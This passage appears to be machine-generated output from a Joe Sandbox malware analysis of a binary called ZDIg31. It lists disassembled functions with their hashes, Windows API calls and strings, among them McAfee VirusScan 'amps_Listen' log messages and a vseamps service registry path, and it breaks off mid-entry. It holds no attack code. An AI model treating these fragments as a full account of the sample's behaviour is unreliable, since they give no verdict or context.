                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                      • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                      • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                      • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                      • Instruction ID: d824ac2141e3c796d93238a07e314ede276d49cb376b5b625d96388ddd9e2b5f
                                      • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                      • Instruction Fuzzy Hash: 2A51D662F1868989FB30DB76A8441AE7BA5FB40BD4F144134EE5D27AB5CE3CD501C750
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookup
                                      • String ID:
                                      • API String ID: 3852435196-0
                                      • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                      • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                      • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                      • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                      • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                      • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                      • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                      • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                      • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                      • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                      • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                      • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                      • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                      • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                      • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                      • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                      • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                      • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                      • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                      • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                      • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                      • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                      • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                      • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                      • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                      • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                      • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                      • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                      • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                      • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                      • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                      • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                      • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                      • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                      • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                      • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                      • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                      • Instruction ID: 4faa4510eab4b6d3a6aeda00544765edd24fcb1eebcde7a33f4469f92af5b72c
                                      • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                      • Instruction Fuzzy Hash: AEF06875B296958ADBA48F28A442A2977D0E748380F548039D58D83B34D63C9550DF24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                      • API String ID: 1021822269-3147033232
                                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                      • API String ID: 883923345-381368982
                                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                      • String ID:
                                      • API String ID: 1613947383-0
                                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 93015348-1041928032
                                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
